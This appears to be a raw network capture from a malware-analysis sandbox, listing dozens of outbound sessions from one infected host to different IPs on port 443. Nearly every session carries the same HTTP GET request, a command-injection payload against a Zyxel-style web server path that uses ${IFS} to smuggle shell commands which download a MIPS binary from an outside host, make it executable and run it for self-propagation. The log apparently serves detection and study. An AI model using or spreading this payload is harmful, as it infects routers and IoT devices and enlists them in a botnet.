                                            Jan 14, 2024 15:50:22.164438009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            300192.168.2.235627812.205.172.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164479017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            301192.168.2.235058632.196.80.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164494991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            302192.168.2.2349290210.41.90.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164532900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            303192.168.2.2352088149.163.172.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164539099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            304192.168.2.2338962194.83.195.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164561033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            305192.168.2.233745840.163.148.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164572954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            306192.168.2.234222681.15.22.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164623022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            307192.168.2.233624618.33.147.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164644003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            308192.168.2.234737496.138.169.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164690971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            309192.168.2.235347241.14.233.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164700031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            310192.168.2.2338420124.216.99.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164737940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            311192.168.2.234832242.116.5.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164757013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            312192.168.2.2335604133.230.216.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164777040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            313192.168.2.233974241.18.199.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164794922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            314192.168.2.2344900189.176.194.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164829016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            315192.168.2.23577545.125.4.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164864063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            316192.168.2.2340124190.188.198.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164901018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            317192.168.2.233597240.15.131.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164925098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            318192.168.2.2334764172.222.230.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.164941072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            319192.168.2.2345870181.194.134.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165018082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            320192.168.2.2332932115.223.136.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165023088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            321192.168.2.2355724184.60.167.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165047884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            322192.168.2.2344828196.112.125.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165067911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            323192.168.2.2338332210.136.88.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165138960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            324192.168.2.2344134157.58.136.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165162086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            325192.168.2.234621420.156.46.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165174961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            326192.168.2.233973463.135.36.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165229082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            327192.168.2.2358176158.127.168.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165270090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            328192.168.2.2353214123.50.196.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165298939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            329192.168.2.2341306144.231.71.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165333986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            330192.168.2.2350768223.165.237.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165344000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            331192.168.2.2342200102.116.106.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165370941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            332192.168.2.233450277.41.67.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165404081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            333192.168.2.2351658129.166.142.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165410995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            334192.168.2.235938877.216.61.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165429115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            335192.168.2.233584635.148.230.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165457010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            336192.168.2.234114244.210.214.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165467024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            337192.168.2.2344020112.186.72.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:22.165988922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            338192.168.2.234753459.165.249.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:23.170114994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            339192.168.2.235650494.139.184.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:23.170180082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            340192.168.2.2360398133.112.242.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173245907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            341192.168.2.233544082.175.213.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173259020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            342192.168.2.235667077.91.4.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173274994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            343192.168.2.235109465.79.208.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173295021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            344192.168.2.2355118101.78.61.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173317909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            345192.168.2.233824267.255.194.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173338890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            346192.168.2.23588584.7.30.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173367977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            347192.168.2.233829097.118.91.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173401117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            348192.168.2.2342984149.238.130.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173418999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            349192.168.2.2335352139.210.218.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173420906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            350192.168.2.233539246.50.255.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173443079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            351192.168.2.234521642.172.135.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173500061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            352192.168.2.233308687.42.244.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173501015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            353192.168.2.2351270143.42.96.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173515081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            354192.168.2.2341644111.7.245.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173549891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            355192.168.2.234098247.5.224.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173573017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            356192.168.2.2339036190.97.190.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173584938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            357192.168.2.2350690111.135.191.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173623085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            358192.168.2.2358892211.184.167.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173633099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            359192.168.2.2346258213.243.148.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173650980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            360192.168.2.2340850147.195.247.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173674107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            361192.168.2.2342280132.20.230.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:24.173681974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            362192.168.2.2342748172.229.199.111443
                                            TimestampBytes transferredDirectionData
